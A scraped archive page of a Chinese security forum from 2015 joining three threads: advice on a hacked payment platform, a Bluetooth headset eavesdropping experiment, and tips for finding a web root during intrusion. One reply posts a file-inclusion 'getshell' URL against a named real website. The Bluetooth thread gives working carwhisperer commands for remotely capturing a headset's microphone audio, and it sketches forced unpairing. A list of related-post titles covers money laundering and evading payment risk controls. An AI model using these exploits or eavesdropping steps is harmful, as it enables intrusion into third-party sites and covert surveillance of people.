然后是服务器端脚本(身份验证用的是哪些方式,是否存在验证不全,验证绕过,验证信息泄露,逻辑错误问题?会话管理是用的哪些方式, 是否存在可猜测,可以被暴力,或者单纯的使用一种方式进行会话管理?典型的就是没有token,访问控制采用了哪些手段,验证的完整吗?) 把服务器端脚本的这些问题检查清楚后下面可以做一个代码审计, 主要是sql注入, 命令执行, 文件包含, 任意文件上传,变量覆盖导致的各种问题,xss, csrf,各种逻辑问题这些, 把应用层的问题基本都撸清楚后, 对它们进行一一修复, 修复后, 继续检查服务器端平台, 检查是否被放了木马, 启动项是否异常, explorer是否被插了dll,是否有异常服务, 是否有异常文件, 如果是linux/unix 可以扫一扫有没有rootkit,有没有对外发包的程序在跑, 不管是windows下的还是linux unix下的, 检查到后对其进行一一删除, 删除完后, 可以对平台和应用进行一次安全加固, 如果你使用的是apache mysql apache下的httpd.conf mysql下的my.ini 如果还有php就是php下的php-apache2handler.ini 这个名字具体要根据版本, 不是固定的, 从这些文件里可以对apache,mysql,php进行一下安全加固, 比如禁用函数, 限制目录等等这些, 详细的可以自己百度, 完了后可以对系统平台进行一下加固, 比如删除不用的帐号, 删除一些命令执行通道,(wsshell, cmd,)或者改名,对负责倒入倒出的dll降权, 等等, 这些公开环境也有资料, 把客户端边界, 服务器端脚本, 服务器端应用平台, 服务器端自身平台都加固完了后, 可以上个防火墙, 弄个监控啥的, 基本就没什么问题了。 12# newline | 2015-11-03 09:27 我上面说的审计流程和方法只是说了个大概, 全部包括并不是只有这些, 你可以结合你所了解的和你的基础进行。 13# hkAssassin | 2015-11-03 09:57 找我,我去抓~~~说那么多有毛用,搞业务之前为什么不想想会被黑掉。就算没有一个全职的安全人员,也得找一个兼职的吧!出问题了自己不查,让你来这里问,你觉的大家说的你能用么?(这就是不重视安全的后果)最好的建议就是钱给到位,找人直接去查,我相信,能出来你期待的结果~~~~ 14# July | 2015-11-03 10:14 后台管理地址主页(index default )解析插入流量统计代码,原来解析文件更名;如果没有统计到第三者或许他已经有服务器权限。 如果是IIS的话后台管理地址,做个IIS访问认证,如果网站还出现异常说明 要查shell 服务器后门 逻辑漏洞 之类的了。 15# Dream° | 2015-11-03 10:39 在网站上面加上来访电脑QQ记录 然后比对时间进行排查黑客操作那个时段的QQ 一般黑客嘛 取名都有点另类 还是比较容易的@zone 16# Dream° | 2015-11-03 10:42 私密我QQ 可以帮你在试试@zone 17# 独臂刀王 | 2015-11-03 10:58 一直我都是伪造金额体现的,,, 18# zone | 2015-11-03 11:03 感谢诸位的建议~多谢啦 :) 19# 这只猪 (会拱白菜) | 2015-11-03 11:31 估计是网站源码泄露了,然后被脸上了数据库操作的。 20# 地瓜 (此处内容为隐藏内容,点击感谢即可查看此内容) | 2015-11-03 15:08 安全狗安全宝D盾 21# 小表哥 | 2015-11-03 15:10 我想知道你找到哪位黑客怎么处理? 损失了没想过报警,自己找出来。。。你是想打他一顿么?? 22# zone | 2015-11-03 15:31 @小表哥 haha 不是不是,觉得值得一提,就是发出来,看看有什么好建议学习学习~ 关键是别让朋友平台在损失了,至于找出那个黑阔,只是我自己脑洞一开,看看有什么姿势,~比如 @一只猿 说的蜜罐~怎么做? 囧 23# 小表哥 | 2015-11-03 15:37 @zone 既然知道他改过的qq,那你就冒充商家去发任务,搞到钓鱼平台然后搞啊 24# zone | 2015-11-03 15:54 @小表哥 他的都是小号,这里是刷手选商家,先刷后付款,这里冒充有难度啊。然后,钓鱼平台搞什么?钓QQ号? 25# LaTCue (善养人妻。) | 2015-11-03 16:35 http://www.diyishuadan.com/ 第一刷单? 如果是这个的话 我可以告诉你漏洞 是DX插件包含 直接getshell http://www.diyishuadan.com/plugin.php?action=../../../../../robots.txt%00&id=dc_mall 26# zone | 2015-11-03 16:39 @LaTCue 不是奥 27# 核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2015-11-04 14:42 “黑客以刷手的身份,让商家在自己电脑上付款,然后达成远程钓鱼的目的。付款的时候,直接伪造付款页面,将钱转走” 太有才了。。 相关内容: 北京NDS公司工程师攻击46万台机顶盒传播反动信息 获刑12年 反黑逆向溯源追踪之:某某某局入侵事件分析 JS绕过代理、VPN获取真实IP及内网IP,逆向追踪 简单获取CDN背后网站的真实IP,CDN逆向,反向跟踪网站真实IP JSON探针—定位目标网络虚拟信息身份,利用大量三方网站cookie进行追踪 社会工程学追踪 妻子花6万挖出小三 给60多个号充话费锁定4人 逆向追踪一起针对国内企业OA系统精心策划的大规模钓鱼攻击事件 警察说:电话诈骗中,骗子存在哪些漏洞 渗透道哥的黑板报里那个骗子网站,入侵电话诈骗的骗子网站 同事亲历的一次电话诈骗 【警惕】一个神秘电话,工商银行卡内余额不翼而飞!网银诈骗! 论黑产黑阔如何安全地转移赃款/洗钱? 论匿名转帐和转移资产的可能,如何:网络匿迹、匿名洗钱、转移资产系统 跨行、跨省银行卡间转账不用手续费?利用支付宝为什么不收手续费? 如果躲开支付宝风险监控,何才能做到不违反支付宝风控条件呢? 网络匿迹、逆向追踪:关于那些做H站的人,是怎么落网的? APT攻击:境外间谍“飞哥”假扮女网友策反境内人员 窃取中国军事秘密 基于行为特征识别的网络诈骗嫌疑人追踪系统 逆向追踪,反向爆菊:在服务器上发现了挖矿程序,求爆菊姿势 【愚人节分享】一个钓鱼方法【测试几分钟有成功案例】 多层代理下解决链路低延迟的技巧,多层代理网络匿迹,反追踪,隐藏、保护自己 基于Wordpress Pingback的反追踪思路?木马远控通过“代理”上线? 揭露一个飞机退改签的诈骗:借口机票退改签要退款,索要银行卡号,套取个人信息 支付宝存漏洞 嫌犯伪造执照盗刷网店20余万 DedeCMS 注入漏洞批量入侵爆菊 Exp 进入了路由器怎么让她进入我的钓鱼网页? 一起网络诈骗案的风险揭示,套取用户信息、信用卡、支付宝、快捷支付洗钱 如何在网络中隐藏自己?再论拨了国外VPN代理,是否可被逆向追踪? 江西男子克隆国外银行卡刷513万 给两任女友395万 跨境盗刷信用卡 支付宝/淘宝帐号无需密码登录任意帐号,随意查看用户资料/交易记录/转账洗钱 个人认为微信支付存在的安全问题,同一银行卡多重绑定,恶意盗刷 关于3G流量上网卡!(匿名上网),隐藏自己、网络匿迹、保护自己 浅谈社工,欢迎讨论、补充,各种猥琐社工、人肉技巧,物理社工、人肉 【TED】Markham Nolan:如何辨别网上信息真伪,神级人肉,物理社工 俄罗斯黑客被曝潜伏Facebook,搭建蜜罐监视tor网络数据 保护水表:关于tor和mac地址的疑问,各位进来讨论一下,反追踪/匿迹 XX域名商实战,社工客服妹妹,毫不费力拿到目标公司内部通讯录 黑阔大牛来说一说切实可行的匿名上网方法 2000万条酒店开房数据泄露 男子婚事被搅黄 探秘时刻:多重身份的逃犯,不翼而飞的七百万,几百买身份证一票弄了700万 由“正方”jiam、jiemi之逆向思及Base64之逆编码表 针对工行诈骗黑产团伙的调查回忆录 开房数据泄露案告破 警方发现嫌犯曾参与多起网络犯罪 再论黑卡,黑吃黑,银行黑卡,超级网银签约直接转账 Liftoh木马钓鱼邮件正在进行时 物理攻击?那些年我们忽略掉的一些社会工程学手段 娱乐贴:看我如何逃避追查以及洗钱 我是这么设计高性能海量数(ku)据(zi)查询系统的(一) 看到有同学在问支付宝快捷支付漏洞--转一篇科普文章 全方位在互联网中保护自己第八章(如何留住数据的节操(上)) 探秘短信马产业链-从逆向到爆菊 探秘伪基站产业链 您的工商银行电子密码器将于次日失效?伪基站垃圾短信,网银钓鱼诈骗! 谷歌云端硬盘在天朝是否真的安全? 朋友点开一个文件给骗30万,一种“高级”QQ诈骗骗术,远控电脑诈骗 关于伪基站的一些问题:信号覆盖范围?设备成本?是否违法?教程资料? 【巨狗血!】奇葩的比特币钓鱼案例!!!!!! 抛砖引玉,扒扒伪基站那些事 伪基站是怎么定位的呢?定位并抓捕伪基站、圈地短信、垃圾短信犯罪团伙! 【讨论】伪基站、圈地短信设备是怎么做出来的? 偷取一个人的钱包,还能让他告诉我信用卡的提款密码 ? 技术讨论:关于盗取支付宝讨论 【防骗】又见网银诈骗,骗子冒充朋友,借口卡丢了先借你卡转账用用,揭秘! 全方位在互联网中保护自己第七章(上网习惯以及计算机唯一代码追踪的防范) GSM Hackeing 之 SMS Sniffer 学习 京东 淘宝 天猫订单信息泄露诈骗, 接到“京东”的客服电话之后遭遇团伙诈骗 金融改革记录片(97% Owned)-97%被私人银行占据的无中生有债务货币 动画科普:银行与货币系统真相,动画揭露货币系统真相 如何发现系统中的异常,交易系统异常行为监控机制讨论 [技术分析]利用波士顿马拉松爆炸案热点的新型APT攻击 了解你的对手:追踪快速响应的APT攻击 【讨论】今天偶遇淘宝另类“骗钱”技巧 淘宝一星期【骗】20万的可行性过程分析 服务器流量异常追踪--抵抗AWVS扫描 【略狗血】一种结合本地程序的更加猥琐的钓鱼方式(中招率+100%) 阴谋论:政府通过手机基站的电子精神控制 adobe 1.5亿泄露数据 密码算法逆向挑战 逆向追踪之:通过QQ群里的图片逆向入侵,拿了几个phpddos的脚本 一个反制钓鱼邮件的思路 CDN流量放大攻击思路 讨论下快捷支付存在的风险 讨论下快捷支付存在的风险 娱乐贴:打击网络诈骗 - 骗子骗钱反被骗 - 发个骗子的手法,其实还是时时彩 全方位在互联网中保护自己第六章(国产软件或后门软件的替代品(下)) 逆向追踪:查找360wifi(知道ssid)的使用者 全方位在互联网中保护自己第三章(知识普及篇—了解网监的实力与暗箭(下) 全方位在互联网中保护自己第一章(知识概念篇第一部分) 简单分析丝绸之路创始人如何被抓,FBI真的能透过TOR获取真实IP么? 全方位在互联网中保护自己第五章(国产软件或后门软件的替代品(中)) 全方位在互联网中保护自己第四章(国产软件或后门软件的替代品(上)) 全方位在互联网中保护自己第二章(知识普及篇第二章-了解网监的实力与暗箭(上)) QQ鱼饵病毒:巧妙突破QQ客户端对钓鱼网站拦截 求黑产大牛目测,一位妹纸的亲身经历,身份证号+手机号洗你银行卡 如何用意念获取附近美女的手机号码,伪装免费CMCC信号,钓鱼妹子手机号码 怪异!10086短信接口泄露?10086发博彩、赌博短信 银行卡里钱莫名其妙被转走了,有身份证号码、姓名、银行卡号就能提款? 注意,日站的时候请清理cookie或使用虚拟机,否则可被cookie追踪 现在傻逼太多,骗人太好骗,淘宝搜剑灵激活码,好多10几块钱的骗子 如何看两个ip是不是在一个机房,路由追踪 猜想:利用GFW使中国对外网络瘫痪??? 逆向追踪之:网站被挂淘客跳转以后发生的事情 猜想_利用终端查询机日内网 免费购物 会员卡加钱??? 【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗? “伪基站”任意冒用手机号短信诈骗 别对我撒谎 让支付简单一点 如何保护自己之防非IP方式追查,黑钱提线,赃物收货。。。。 为抓小偷 俄警方在地铁安装能读取乘客手机信息的设备,这是啥技术? 山西破获首起“伪基站”案件 逆向爆菊、反向追踪之:追查史上最奇葩的“挂马”黑客! 物理设备安全大牛 Barnaby Jack 挂了... 保护自己之手机定位信息收集 一个诈骗类的技术性问题,朋友的! 请教关于手机IMEI定位的问题 安全跑路指南2013之乌云版【连载中】 一种巨猥琐的挂马方法、超淫荡的APT攻击思路:如果这么挂马会不会挂进内网 女士回电信诈骗电话 几秒钟时间100元话费没了 发两个qq钓鱼站点 求测试 - 乌云白帽子 XSS 实例 刚刚看到个鱼站,然后就被轮流爆菊了…… 小型APT之看我如何入侵电视,我是如何入侵智能电视的 一张随意拍摄的波士顿马拉松比赛照片,如何帮助FBI破案 我们是如何通过一张照片定位到疯狗位置的 分享下自己使用的保护方法篇章二(虚拟机模板环境设置) 连载中... 针对莱特币的新木马被发现 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置)连载中... 分享下自己使用的保护方法篇章一(虚拟机代理中转服务器设置) 连载中... 使用电视棒接收飞机信号 简单的实现方法 超级短信DDOS 女生一天收上万条10086短信 还有近50万条等着她 微信聊天都是你好友吗?“诈骗”之“微信社工学” 【姊妹花】淘宝一敬业诈骗【50和我谈了一个小时】 R820T电视棒+软件无线电跟踪飞机飞行轨迹(SDR&ADS-B) rtl-sdr,RTL2832+E4k tuner电视棒跟踪飞机轨迹 ADS-B/TCAS/SSR rtl-sdr,RTL2832电视棒跟踪飞机轨迹教程(ADS-B), SDR GPS 飞机追踪 雇黑客攻陷招生网站改成绩 3骗子做发财梦进看守所 淘宝钓鱼诈骗,如今淘宝各个分支产业对网民不利的分支缺陷 公布一个非常高端的淘宝店铺骗局方法 户外物理设备入侵之:入侵并“调教”中控指纹语音考勤系统(打卡机) 上来吐个槽,再次侦破一宗牵扯到全国多个大型医疗集团的恶性案件! 再次遭遇 GoTop 挂机刷钱“病毒”,逆向爆菊,追踪背后“牧马人” 公共无线安全——FakeAP之WiFi钓鱼 GNU Radio USRP OpenBTS 小区短信 区域短信 一种牛逼的短信群发技术 GNU Radio 小区短信 区域短信 免费发 无法拦截 【传奇】看职业骗子如何揭发谷歌广告服务的不法活动,谷歌5亿美元和解费 钓鱼之XSIO漏洞,一个非常猥琐的“漏洞” 54dns劫持实现dns钓鱼攻击威胁? 百度搜索页面劫持脚本,百度搜索来路页面跳转劫持,骗点击 上海伊莱美医院被黑、黑帽SEO做淘宝客,核总深入追查,揪出内鬼! 支付宝木马爆菊过程总结帖【附源码】 接上一章节,支付宝木马,后续情节【2】 高级钓鱼攻击来了:针对拍拍的XSS攻击 接上一章节,支付宝木马,后续情节 360对你真的起作用了吗?bypass....分析支付宝网银木马,反爆菊花 一种猥琐方式的对攻击者定位(观315有感) 国外发现中国针对美国无人机厂商的APT攻击 中国是全球最大的的APT攻击来源 揭秘诈骗千万人民币的团伙及具体位置分析 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店 核总霸气分析“天津丽人女子医院”主站被黑、挂淘宝客、黑帽SEO全过程! 公安部督办QQ红钻诈骗案破获 腾讯损失3000余万 中国电信ADSL宽带信息泄露,可查任意IP对应的宽带账号,电话号码,上门砍人 接着核总的《打击钓鱼,人人有责》之后的故事... 打击钓鱼,人人有责…… 研究人员首次发现用于针对性攻击的Android木马 【跟风贴】XSS挖出一个黑产团体 XSS挖出一个黑产团体 《XSS挖出一个黑产团体》 山寨广告非法医疗搜索引擎路在何方,医疗 = 巨型诈骗军团! 物理黑客户外硬件入侵之:某咖啡厅的广告展示终端…… 陌陌猥琐流定位妹纸精准位置 有图有真相 + 安卓工具 追查黑客姓名,邮箱,支付宝信息,惊现大规模僵尸网络,要求警方介入处理! 服务器被入侵之后,反爆1433抓鸡黑客菊花,并公布大量黑阔账号密码 公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析 [讨论]如何入侵一个户外的电子显示屏 探索网络出口GFW的强度与翻墙 二维码应用漏洞|欺骗|....更多好玩的??? [fixed]中国移动139邮箱之前的一个重置密码流程漏洞 耍了一个发给我网购木马的骗子~~ Inception能入侵全盘加密的计算机,修改物理机器内存/任意密码进入 android 延迟锁定bug,安卓手机锁破解,屏幕解锁保护 关于手机的隐私保护。。 关于X卧底的通话监听、短信记录、定位追踪等侵犯隐私的行为讨论 支付宝的设计问题 401钓鱼新玩法,反向401钓鱼 远程入侵QQ好友所在网吧监控系统,人脸识别、定位坐标,定点打击 骗子卖家利用淘宝交易漏洞骗流量 追踪PlugX Rat作者,人肉定向攻击远控PlugX开发者 中斯警方联合行动抓获百名电信诈骗案嫌疑人 看新闻学知识之手机千里追回 西安丢iPhone定位在北京民警辗转2400公里追回 定位GFW的python脚本,如何找到GFW设备的IP地址 电话诈骗手段升级 听按键音破译银行密码 如果大量短信攻击会不会造成拒绝服务,导致手机接不进电话? 钓鱼网站诱骗支付占据网络不安全事件首位 微博“兼职”被骗3000 上网“报警”又被骗1300 东京大学加密招生海报解密过程(内含妹子) “钓鱼”网站横行:运营商与搜索引擎成帮凶 发现APT攻击的破绽 Android 无视屏幕解锁保护界面 - 安卓手机锁破解 网曝银行卡密码“漏洞” 网上团购月饼支付变游戏点卡 钓鱼网站借此牟利 视频:神奇的读心大师 网上有你的整个人生 利用社工+人肉来做神棍…… 十一黄金周 钓鱼网站常以优惠做诈骗噱头 《魔兽世界》截屏数据水印惊现用户私人数据 截图隐藏水印 暗含玩家信息 简单分析一个通过 js 劫持进行黑帽 SEO 做淘宝客的案例 如何从按键音中听出360总裁周鸿祎的手机号码 + 详细剖析 iPhone 短信欺骗漏洞攻击器、伪造短信号码工具、伪装发件人攻击器 Never trust SMS: iOS text spoofing,永远不要相信短信:iOS的文字欺骗 iPhone 短信欺骗漏洞披露,伪造短信号码、自定义短信手机号 男子淘宝购物10秒后接“卖家”电话 被骗7000元 找出 GFW 在 Internet 的位置、追踪 GFW 在互联网中的位置 德安全专家破解GSM加密算法 GSM网络破解 监听全球40亿部手机 非法获取百度推广账号 实施网络诈骗 篡改百度推广 市民被骗财 黑客在Defcon建立私人电话网络 - DEFCON 忍者 GSM 网络 支付宝错发中奖短信 送236台iPad2 网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 【需翻墙】网监如何爆菊?网警是如何通过层层VPN加密代理找到你的! 讲述一个关于高考的“黑客”故事:用2B铅笔“注入”阅卷系统 6000万网民一年被骗300多亿元 奇虎360成功加入GFW防火长城 为国家安全保驾护航 著名编剧宁财神被遭遇钓鱼淘宝 被骗近万元 虚假客服电话充斥互联网行骗 专家:竞价排名是祸首 公布 GFW 防火墙旗下部分子服务器 IP 电信诈骗韩国人案抓235人 涉案金额1亿多 男子侵入上海移动平台群发广告短信牟利获刑 福布斯:IE10“禁止追踪”扼杀网络广告市场 网购158元的货物之后被网站“钓”走2万 我国警方成功摧毁特大跨国跨两岸电信诈骗犯罪集团 美国秘密研制新概念网路武器 可攻击离线电脑 无线电信号渗透 Msnshell的那个有问题的官方下载链接追踪 刷下“拉卡拉”卡里2万多块钱丢了,复制银行卡,POS机、刷卡黑客 病毒集团盯上网络购物 在淘宝上被诈骗5.46万元 浙江绍兴一犯罪团伙用网银漏洞诈骗三百余万获刑 看FBI是怎么网络钓鱼执法的 华裔黑客 BITcrash44 凭借一台 iPhone4 拿下时代广场大屏幕 视频:国外黑客无线入侵、遥控电子路桥系统 视频:国外黑客无线入侵保时捷911,并且远程操控、遥控 视频:国外黑客利用一部诺基亚N95手机入侵火车站电子屏,并且现场直播 视频:国外黑客入侵高速公路交通电子屏 大屏系统被黑 泰国国会现场直播不雅照 碰到一个冒充QQ好友进行诈骗的骗子…… 利用电磁波进行入侵、原子级的黑客入侵、利用电磁波毁坏物理设备 QQ邮箱漏洞被骗子利用 小企鹅一闪1000块被骗走 电信诈骗,电话营销,一响挂电话,推销平安、人寿保险,冒充朋友 广东台湾两地警方联手破获电信诈骗大案 电视机会收到邻居游戏机画面?小霸王信号干扰?红白机功率这么强悍? 任何一种装机量巨大的软件,都有政府监控模块,我们应该如何保护自己? 我国将建立IP地址黑名单制度 打击网络垃圾邮件 小米官网“闹鬼” 消费者买手机三千元被骗 末世入侵行动 (Fire Sale!) 末日入侵行动 黑客曝联通“10010短信”漏洞 被指易遭诈骗利用 网络钓鱼危急行业发展 专家呼吁各方合力围剿 黑客考虑发射通讯卫星对抗全球互联网监管 Tabnapping 浏览器标签劫持 用假冒浏览器标签进行钓鱼攻击 GSM蜂窝基站定位基本原理浅析 用黑客方式找回失窃的电脑 - GSM基站定位 - Wifi热点定位 不要偷黑客的东西 - Why you don't steal from a hacker 惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”! 物理攻击、抓频攻击 - 利用雷达来进行扫描网络弱点 解密电信诈骗:改号平台盗用110 日拨上万电话 67名跨国电信诈骗嫌犯从菲律宾押解回到福州 工程师网盗支付宝11万 开设79个账户转移盗款 【分析】腾讯独立域名QQ空间被钓鱼,腾讯官网被黑,被植入钓鱼页面! 男子信用卡绑定电话遭修改被盗刷7万元 北京警方破获新型网络合同诈骗案 黑客盯上外贸公司业务员邮箱 入侵员工电脑 跨国诈骗案 黑客的新目标:泄密其他黑客资料 台两15岁少年开淫窟 骗12名少女为“爱”卖身 月进300万元 【公告】警惕名为:Nuclear'Atk. QQ:424244818 冒充本人的骗子黑客 苹果iPhone和谷歌Android手机被曝"定位"用户 入侵者必读, 网警、公安是如何找到你的! 【视频】宝坻 - 历史上最胆大的银行劫匪 某人肉搜索的典型案例分析 一群推理神牛 无银行卡,密码10万元1分钟转走,超级黑客? 【公告】公布一个特大诈骗案件的网络“黑客” DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击 留言评论(旧系统): 佚名 @ 2016-01-06 21:49:00 有接单的吗联系我1343119337 本站回复: 站长提示:网络广告有风险,注意辨别,谨防上当受骗!!! 仁二 @ 2016-04-10 05:00:30 路过 本站回复: +1 and1=1 @ 2016-04-18 11:31:35 123 本站回复: 123

2015/11/4
articleCard.readMore

物理黑客:窃听蓝牙耳机小实验,手机蓝牙耳机渗透入侵,远程窃听音频

窃听蓝牙耳机小实验 mramydnei | 2015-10-19 22:41 上周看了下Hirsch-Bluetooth-Device-Security-2015感觉里面的这段挺好玩的。 Scenarios (5) Example #4: all Bluetooth speakers or headsets that are auto-discoverable with HSP (headset) service (most have this) ● Eve walks down street listening for auto- discoverable HSP devices (these are common!) ● Eve notes that many well-to-do neighborhoods have lots of these HSP devices left on 24/7, and that Eve can pair remotely without local confirmation, and listen to everything in the home the microphone can pick up. 产品名:ELECOM HS10 支持的协议:HFP/HSP 通信方式:蓝牙3.0 然后开始RTFM。发现默认PIN是0000,长按操作按钮5s后会进入到匹配模式。按照说明书长按5s进入到匹配模式后,开始借助pc扫描蓝牙设备 root@kali:~# hcitool scan Scanning ... 28:52:E0:XX:XX:XX HS10 service bluetooth restart hciconfig hci0 up hciconfig hci0 class 0x500204 root@kali:~/carwhisperer-0.2# hciconfig -a hci0: Type: BR/EDR Bus: USB BD Address: A8:86:DD:XX:XX:XX ACL MTU: 1021:8 SCO MTU: 64:1 UP RUNNING RX bytes:508634 acl:119 sco:9598 events:755 errors:0 TX bytes:212355 acl:132 sco:9486 commands:371 errors:0 Features: 0xbf 0xfe 0xcf 0xfe 0xdb 0xff 0x7b 0x87 Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3 Link policy: RSWITCH SNIFF Link mode: SLAVE ACCEPT Name: 'kali' Class: 0x500204 Service Classes: Object Transfer, Telephony Device Class: Phone, Cellular HCI Version: 4.0 (0x6) Revision: 0x22fc LMP Version: 4.0 (0x6) Subversion: 0x416a Manufacturer: Broadcom Corporation (15) http://trifinite.org/Downloads/carwhisperer-0.2.tar.gz root@kali:~/carwhisperer-0.2# carwhisperer hci0 message.raw justatest00.raw 28:52:E0:XX:XX:XX Voice setting: 0x0060 RFCOMM channel connected SCO audio channel connected (handle 6, mtu 64) got: AT+VGS=14 ansewered: OK . . root@kali:~/carwhisperer-0.2# play -t raw -r 8k -e signed -b 16 -c 1 justatest00.raw justatest00.raw: File Size: 91.8k Bit Rate: 128k Encoding: Signed PCM Channels: 1 @ 16-bit Samplerate: 8000Hz Replaygain: off Duration: 00:00:05.74 In:100% 00:00:05.74 [00:00:00.00] Out:45.9k [ | ] Clip:0 Done. [原文地址] 各种吐槽: 1# mango (待我乌币800万 姑娘嫁我可好) | 2015-10-19 22:47 有视频嘛 2# mramydnei | 2015-10-19 22:52 @mango 我录一个加进去吧。 3# 苦咖啡 | 2015-10-19 22:55 录制一个吧 看起来很好玩 4# mango (待我乌币800万 姑娘嫁我可好) | 2015-10-19 23:07 @mramydnei 恩恩~~这样最号~~ 5# mramydnei | 2015-10-19 23:35 6# 数据流 (| 1970-00-00 00:00) | 2015-10-20 00:26 “更改device class假装自己是一台手机”。 用伪装一词会不会更好呢。(·_·) 7# 小手冰凉 | 2015-10-20 05:16 没看明白,攻击场景是什么?用自己的设备连上对方处于挂起状态的蓝牙耳机? 8# 爱捣蛋的鬼 | 2015-10-20 10:41 是可以窃听戴的人周边的声音吗, 如果已经和手机对接上了,这个是不是就无效了 9# 数据流 (| 1970-00-00 00:00) | 2015-10-20 11:18 @小手冰凉 首先要让别人处于未连接状态。 10# 南哥 (<///////////////////////>) | 2015-10-20 12:16 mark 11# 白无常 | 2015-10-20 15:46 留名 12# 疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-10-20 17:34 @mramydnei 可以这样理解不,这个演示是因为蓝牙耳机、话筒在未连接前提下是可以被发现的(蓝牙主动广播),然后客户端伪装成手机在用默认PIN 0000链接上去,麦克风就开始正常工作了,然后通过蓝牙栈开发的小程序记录下通信中的音频脉冲,最后重方。是这样子么? 13# mramydnei | 2015-10-20 18:18 @疯狗 是的,不过实战中应该还有很多坑需要去填。 余下的部分还在学习和测试当中 14# 疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-10-21 17:15 @mramydnei 嗯,看来理解无误,但影响还是挺大的,而且中间蓝牙协议的通信都是蛮好玩的部分,期待近期发个后续心得啊。如果没啥问题,俺最近也写点BLE安全的跟你凑凑热闹。 15# 数据流 (| 1970-00-00 00:00) | 2015-10-21 17:32 @疯狗 狗哥也在研究ble呀? 16# mramydnei | 2015-10-21 17:41 @爱捣蛋的鬼 @小手冰凉 需要满足3个条件: (1)知道目标设备的蓝牙地址 (2)需要保证目标设备处于没有和其它设备连接的状态 (3)知道pin code是多少 17# mango (待我乌币800万 姑娘嫁我可好) | 2015-10-21 17:48 @mramydnei 视频已被屏蔽 18# mramydnei | 2015-10-21 17:49 关于(2)如果目标耳机支持同时连接多台设备,应该不是必要条件 19# 疯狗 (阅尽天下漏洞,心中自然无码。) | 2015-10-21 19:09 @数据流 是啊 ble便宜 20# insight-labs (Root Yourself in Success) | 2015-10-21 19:50 @mramydnei 有没有类似deauth攻击的方法强行解除配对…… 21# mramydnei | 2015-10-21 22:00 @insight-labs yes,如果假设蓝牙耳机是和手机连接的,那么手机端必须支持unpairing。 (1)获取蓝牙耳机的地址,将你的蓝牙地址更改成耳机的蓝牙地址 (2)jam掉原始的连接(手机和耳机之间的) (3)现在给手机发送link layer connection,说老子把key弄丢了,怎么办? (4)手机这个时候也许会说 居然你忘记了 那我们就再配对一次吧(总不能就这么把这个耳机给废了不是。。) 理论上是这么个流程吧。不敢打包票 22# mramydnei | 2015-10-21 22:03 @mango 屏蔽原因:按照相关规定,限制传播 请注意: 《互联网信息服务管理办法》所严禁的九类信息 (一)反对宪法所确定的基本原则的; (二)危害国家安全,泄露国家秘密,颠覆国家政权,破坏国家统一的; (三)损害国家荣誉和利益的; (四)煽动民族仇恨、民族歧视,破坏民族团结的; (五)破坏国家宗教政策,宣扬邪教和封建迷信的; (六)散布谣言,扰乱社会秩序,破坏社会稳定的; (七)散布淫秽、色情、赌博、暴力、凶杀、恐怖或者教唆犯罪的; (八)侮辱或者诽谤他人,侵害他人合法权益的; (九)含有法律、行政法规禁止的其他内容的。 23# insight-labs (Root Yourself in Success) | 2015-10-21 22:10 视频传youtube 留言评论(旧系统): 佚名 @ 2015-11-10 14:07:25 楼主你的视频好像被和谐了 本站回复: 有可能被删了…… -_-!!! 佚名 @ 2016-04-09 16:47:20 66666666666666666666666666666666666 本站回复: 66666666666666666666666666666666666 佚名 @ 2016-04-21 15:51:12 请问在carwhisperer连接蓝牙耳机的时候出现 can't connect SCO audio channel!:Function not implemented 该怎么解决呢? (耳机是用的蓝牙4.1版本不知道有米有影响) 本站回复: 不太清楚,百度一下。

2015/10/26
articleCard.readMore

讨论:如何只使用一条命令找出系统web路径,渗透时秒找网站根目录?

一条命令找出系统web路径 xsser (十根阳具有长短!!) | 2015-10-23 17:48 经常在一个系统里需要快速定位到web路径,如果在标准化系统里如何一条命令快速实现这一点呢? :) [原文地址] 各种吐槽: 1# YY-2012 (#)<alert("dandan")>(#) | 2015-10-23 17:59 find 2# 园长 (喵~) | 2015-10-23 18:02 find / -name "*.php" 3# 数据流 (| 1970-00-00 00:00) | 2015-10-23 18:15 在网站上找个比较唯一的文件名,例如"member_index.php" 然后find之 4# 乌云厂商 | 2015-10-23 18:24 .bash_history 5# if、so | 2015-10-23 18:36 找脚本文件会有备份文件和多个web目录的干扰,在目录杂乱的时候,可以find自己上传的文件 6# 猪猪侠 (每次有人骂我是猪我都说自己是猪猪侠) | 2015-10-23 18:48 httpd,nginx,tomcat,jboss的error_log 7# ❤ (❤) | 2015-10-23 18:55 find . -name "*.类型" | xargs grep "关键字" 8# 李旭敏 (˿̖̗̀́̂̃̄̅̆̇̈̉̊̋̌̍̎̏̐̑̒̓̔̕) | 2015-10-23 18:58 find robots.txt 9# jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2015-10-23 19:02 打开web查看源码,复制一个特征字符串,然后替换进下面命令的htmlString搜索之。 win: findstr /s /i /n /d:C:\ "htmlString" *.* linux: find / -name "*.*" | xargs grep "htmlString" 10# ❤ (❤) | 2015-10-23 19:09 @jeary 鼠大侄,Win的搜索第一次用,测试了下蛮好使. 11# Sunshie (博客http://phpinfo.me 论坛 www.itgou.club) | 2015-10-23 19:11 cat /etc/nginx/conf/vhost/web.conf | grep root 12# px1624 (aaaaaaaaa) | 2015-10-23 19:30 find吧,不过前提需要有个独一无二的参考文件或者文件夹 13# jeary ((:‮?办么怎,了多越来越法方象抽的我)) | 2015-10-23 20:25 @❤ 其实我觉得重点不在于搜索的命令,因为大家都懂。而在于怎样匹配一个通用特征。如果只是单个web倒是好办。如果要做到通用,我觉得还是需要一个脚本来搞定。 14# loopx9 | 2015-10-23 20:52 /proc/self/cmdline /proc/self/maps web容器路径-->配置文件 15# 蓝翔小王子淫长 | 2015-10-23 23:15 find吧 16# 醉青丝 | 2015-10-23 23:27 find / -name "*sdasiod.jpg" 17# mramydnei | 2015-10-24 12:55 这种写法应该有点作弊嫌疑,不过改一改应该能用。。 输入: root@kali:/etc/nginx/sites-available# echo "-----------------------start---------------------";find /etc 